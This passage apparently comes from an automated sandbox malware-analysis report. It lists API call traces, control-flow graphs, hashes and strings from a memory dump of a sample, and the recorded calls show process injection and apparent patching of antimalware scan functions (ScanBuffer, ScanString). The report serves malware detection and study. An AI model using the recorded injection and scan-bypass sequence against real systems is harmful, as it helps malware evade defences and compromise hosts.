                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,03330350,0330AC74,ScanString,03330350,0330AC74,ScanBuffer,03330350,0330AC74,ScanString,03330350,0330AC74,OpenSession,03330350), ref: 033090DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 033090E3
                                                                                                    • NtOpenProcess.NTDLL(033307E0,001F0FFF,03330330,03330348), ref: 033091C3
                                                                                                      • Part of subcall function 032B2F9C: QueryPerformanceCounter.KERNEL32 ref: 032B2FA0
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000078,00000000,00000000), ref: 03309516
                                                                                                      • Part of subcall function 032CFB88: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032CFB95
                                                                                                      • Part of subcall function 032CFB88: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFB9B
                                                                                                      • Part of subcall function 032CFB88: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 032CFBBB
                                                                                                    • IsBadReadPtr.KERNEL32(14D50000,00000040,?,?,00000078,00000000,00000000), ref: 03309720
                                                                                                    • IsBadReadPtr.KERNEL32(?,000000F8,14D50000,00000040,?,?,00000078,00000000,00000000), ref: 0330974D
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,17D49400,00003000,00000040,?,000000F8,14D50000,00000040,?,?,00000078,00000000,00000000), ref: 033097A4
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,03330350,0330AC74,ScanBuffer,03330350,0330AC74,ScanBuffer,03330350,0330AC74,OpenSession,03330350,0330AC74,ScanBuffer,03330350), ref: 0330A304
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0330A30A
                                                                                                    • NtWriteVirtualMemory.NTDLL(068B0000,068B0000,15450000,17D49400,00000000,OpenSession,03330350,0330AC74,UacInitialize,03330350,0330AC74,UacScan,03330350,0330AC74,00000000,C:\Windows\System32\ntdll.dll), ref: 0330A48C
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanString,03330350,0330AC74,UacScan,03330350,0330AC74,OpenSession,03330350,0330AC74,ScanBuffer,03330350,0330AC74), ref: 0330A65C
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0330A662
                                                                                                    • RtlCreateUserThread.NTDLL(068CF070,00000000,00000000,00000000,00000000,00000000,068CF070,00000000,033307BC,00000000,ScanString,03330350,0330AC74,OpenSession,03330350,0330AC74), ref: 0330A7F7
                                                                                                    • CloseHandle.KERNEL32(00000884,ScanBuffer,03330350,0330AC74,OpenSession,03330350,0330AC74,?,?,00000078,00000000,00000000), ref: 0330A8F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleProcess$AddressCurrentModuleProc$MemoryVirtual$LibraryReadWrite$AllocateCacheCloseCounterCreateFlushFreeInstructionLoadOpenPerformanceProtectQueryThreadUser
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$RtlCreateUserThread$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                    • API String ID: 2432997404-1975312874
                                                                                                    • Opcode ID: c31e8fd8b182c4bb0c2d4bb9cc068f77df689377d55ed2760bd581f228124e09
                                                                                                    • Instruction ID: fa854880682b7dbfad922c645984f80b808a0545338a5489b073c2ac3308ba07
                                                                                                    • Opcode Fuzzy Hash: c31e8fd8b182c4bb0c2d4bb9cc068f77df689377d55ed2760bd581f228124e09
                                                                                                    • Instruction Fuzzy Hash: 50F2FB38A203199FDB15FB69DDD0BCEB3B9AF44740F1141A5E008EF256DAB0AE818F55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B5DDC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5009 32b5ddc-32b5e1d GetModuleFileNameA RegOpenKeyExA 5010 32b5e5f-32b5ea2 call 32b5c18 RegQueryValueExA 5009->5010 5011 32b5e1f-32b5e3b RegOpenKeyExA 5009->5011 5016 32b5ec6-32b5ee0 RegCloseKey 5010->5016 5017 32b5ea4-32b5ec0 RegQueryValueExA 5010->5017 5011->5010 5012 32b5e3d-32b5e59 RegOpenKeyExA 5011->5012 5012->5010 5014 32b5ee8-32b5f19 lstrcpynA GetThreadLocale GetLocaleInfoA 5012->5014 5018 32b5f1f-32b5f23 5014->5018 5019 32b6002-32b6009 5014->5019 5017->5016 5020 32b5ec2 5017->5020 5022 32b5f2f-32b5f45 lstrlenA 5018->5022 5023 32b5f25-32b5f29 5018->5023 5020->5016 5024 32b5f48-32b5f4b 5022->5024 5023->5019 5023->5022 5025 32b5f4d-32b5f55 5024->5025 5026 32b5f57-32b5f5f 5024->5026 5025->5026 5027 32b5f47 5025->5027 5026->5019 5028 32b5f65-32b5f6a 5026->5028 5027->5024 5029 32b5f6c-32b5f92 lstrcpynA LoadLibraryExA 5028->5029 5030 32b5f94-32b5f96 5028->5030 5029->5030 5030->5019 5031 32b5f98-32b5f9c 5030->5031 5031->5019 5032 32b5f9e-32b5fce lstrcpynA LoadLibraryExA 5031->5032 5032->5019 5033 32b5fd0-32b6000 lstrcpynA LoadLibraryExA 5032->5033 5033->5019
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,032B0000,0331A794), ref: 032B5DF8
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032B0000,0331A794), ref: 032B5E16
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032B0000,0331A794), ref: 032B5E34
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 032B5E52
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,032B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 032B5E9B
                                                                                                    • RegQueryValueExA.ADVAPI32(?,032B6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,032B5EE1,?,80000001), ref: 032B5EB9
                                                                                                    • RegCloseKey.ADVAPI32(?,032B5EE8,00000000,?,?,00000000,032B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 032B5EDB
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 032B5EF8
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 032B5F05
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 032B5F0B
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 032B5F36
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032B5F7D
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032B5F8D
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032B5FB5
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032B5FC5
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 032B5FEB
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 032B5FFB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                    • Opcode ID: d996a6017fb983c6e21580112a004b2a7852a110a9dcda8dc0a1f16d31d8dd54
                                                                                                    • Instruction ID: d35a1f9bb04da3b2787af7d0589dbf498bf176297bad17ed8bdb0ddbbd88f0b8
                                                                                                    • Opcode Fuzzy Hash: d996a6017fb983c6e21580112a004b2a7852a110a9dcda8dc0a1f16d31d8dd54
                                                                                                    • Instruction Fuzzy Hash: 0D51B875A2035D7EFB21D6A4CC46FEFB7BC9B057C0F1404A1A644EA181D7B4AAD48BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CFD40 Relevance: 15.1, APIs: 10, Instructions: 70nativelibraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                    • GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                    • GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                    • NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                    • GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                    • NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                    • FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$LibraryMemoryVirtual$AddressCacheFlushFreeHandleInstructionLoadModuleProcProtectWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 2600374472-0
                                                                                                    • Opcode ID: 4ac48016fcb03db99a80946104659b8a96a6c0b4a25e2e96cee81e3783999ea9
                                                                                                    • Instruction ID: 58c270208effd906b3448608247616552ec79441764dcb009ae98cac7587931b
                                                                                                    • Opcode Fuzzy Hash: 4ac48016fcb03db99a80946104659b8a96a6c0b4a25e2e96cee81e3783999ea9
                                                                                                    • Instruction Fuzzy Hash: 2C219D79770348BFCA04FBE4CD92F9E76BCEB04B50F508415B104AF292CBB499808715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CFB86 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032CFB95
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFB9B
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 032CFBBB
                                                                                                    Strings
                                                                                                    • NtAllocateVirtualMemory, xrefs: 032CFB8B
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 032CFB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                    • API String ID: 421316089-2206134580
                                                                                                    • Opcode ID: 1426a091a5044ef139cebf26350590e776761e8f46431fa7443c78462a461782
                                                                                                    • Instruction ID: 6fb5188ac1394d1885563d349ab429786a1ccc24e4cd6d0ce1c25e63275ba3a0
                                                                                                    • Opcode Fuzzy Hash: 1426a091a5044ef139cebf26350590e776761e8f46431fa7443c78462a461782
                                                                                                    • Instruction Fuzzy Hash: 9AE09A76250248BFCB40EF98D995EDB77ECAB1C750F408015BA19D7501D770E9508B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CFB88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032CFB95
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFB9B
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 032CFBBB
                                                                                                    Strings
                                                                                                    • NtAllocateVirtualMemory, xrefs: 032CFB8B
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 032CFB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                    • API String ID: 421316089-2206134580
                                                                                                    • Opcode ID: 9871ee2b425a2d8dfbc92c361764f12e96afc997c07bb006f24264c6a05ccac7
                                                                                                    • Instruction ID: 88c97a0e152bd5d523058e6f105397192d34aebc542929b3459f9c90cedb328c
                                                                                                    • Opcode Fuzzy Hash: 9871ee2b425a2d8dfbc92c361764f12e96afc997c07bb006f24264c6a05ccac7
                                                                                                    • Instruction Fuzzy Hash: B4E09A76150248BFCB40EF98D995EDB77ECAB1C750F408015BA19D7501D770E5508B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0330B780 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 032B5228: SysAllocStringLen.OLEAUT32(?,?), ref: 032B5236
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0330B850), ref: 0330B7BB
                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0330B850), ref: 0330B7EB
                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0330B800
                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0330B82C
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0330B835
                                                                                                      • Part of subcall function 032B4F68: SysFreeString.OLEAUT32(0330C964), ref: 032B4F76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1897104825-0
                                                                                                    • Opcode ID: 3f1f6e31735f02499abf9ae86de98f3e406f13b3a0e767e036612d8ea3804c06
                                                                                                    • Instruction ID: 96a506439a3da0c0acf1ae36401332a7f8b321bf6b06452e70afcc47df20032c
                                                                                                    • Opcode Fuzzy Hash: 3f1f6e31735f02499abf9ae86de98f3e406f13b3a0e767e036612d8ea3804c06
                                                                                                    • Instruction Fuzzy Hash: 6121D075A50318BEEB11EAE4CC92FDEB7BCEB08700F510466F610FB1C1DAB4AA458794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0330BB50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0330BC8E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckConnectionInternet
                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                    • Opcode ID: ff942b1520f7b43a0d265c6facf21515f7a493d56994174693a3a869767a46cc
                                                                                                    • Instruction ID: d8193e747c6cb614e15391eaddab89ba224fcda3396715d8b308960f485d2e70
                                                                                                    • Opcode Fuzzy Hash: ff942b1520f7b43a0d265c6facf21515f7a493d56994174693a3a869767a46cc
                                                                                                    • Instruction Fuzzy Hash: 1E414139B203089FDB04FBA5C9E1EDEF3B9EF48740F514425E110AB252DAB0ED418B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0330B69C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 032B5228: SysAllocStringLen.OLEAUT32(?,?), ref: 032B5236
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0330B76E), ref: 0330B6DB
                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0330B715
                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0330B742
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0330B74B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3764614163-0
                                                                                                    • Opcode ID: bad0f232eaafaf47a1215a82cb804f844ff1c01d79c78b54852837ac6648f33e
                                                                                                    • Instruction ID: 2db65a84b278f9c842e8f0fbdb0705dacbe2de59f85d4a381c8919ee47b491a4
                                                                                                    • Opcode Fuzzy Hash: bad0f232eaafaf47a1215a82cb804f844ff1c01d79c78b54852837ac6648f33e
                                                                                                    • Instruction Fuzzy Hash: E821ED75A50308BEEB10EBA4CD92FDEB7BCDF04B00F614461B610FB1C1D6B4AB448A54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CEF94 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032CEF38: CLSIDFromProgID.OLE32(00000000,?,00000000,032CEF85,?,?,?,00000000), ref: 032CEF65
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,032CF078,00000000,00000000,032CEFF7,?,00000000,032CF067), ref: 032CEFE3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                    • String ID:
                                                                                                    • API String ID: 2151042543-0
                                                                                                    • Opcode ID: ccf0ce471d36aef00869ba728a5c1f80e96bf9fe21d2eaa6b98b9f891f25d75b
                                                                                                    • Instruction ID: 0dc97bec90c73e04b3d6289219029ac5337a4e20239b93f6460673be2db39344
                                                                                                    • Opcode Fuzzy Hash: ccf0ce471d36aef00869ba728a5c1f80e96bf9fe21d2eaa6b98b9f891f25d75b
                                                                                                    • Instruction Fuzzy Hash: 4E01F7346387846ED711DF609C128BEB7FCE749B40F520579F800D2A81EAB45D40C664
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 033195F8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,0331967E), ref: 03319612
                                                                                                      • Part of subcall function 032F7438: GetCurrentProcessId.KERNEL32(?,00000000,032F75B0), ref: 032F7459
                                                                                                      • Part of subcall function 032F7438: GlobalAddAtomA.KERNEL32(00000000), ref: 032F748C
                                                                                                      • Part of subcall function 032F7438: GetCurrentThreadId.KERNEL32 ref: 032F74A7
                                                                                                      • Part of subcall function 032F7438: GlobalAddAtomA.KERNEL32(00000000), ref: 032F74DD
                                                                                                      • Part of subcall function 032F7438: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,032F75B0), ref: 032F74F3
                                                                                                      • Part of subcall function 032F7438: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,032F75B0), ref: 032F7577
                                                                                                      • Part of subcall function 032F7438: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 032F7588
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
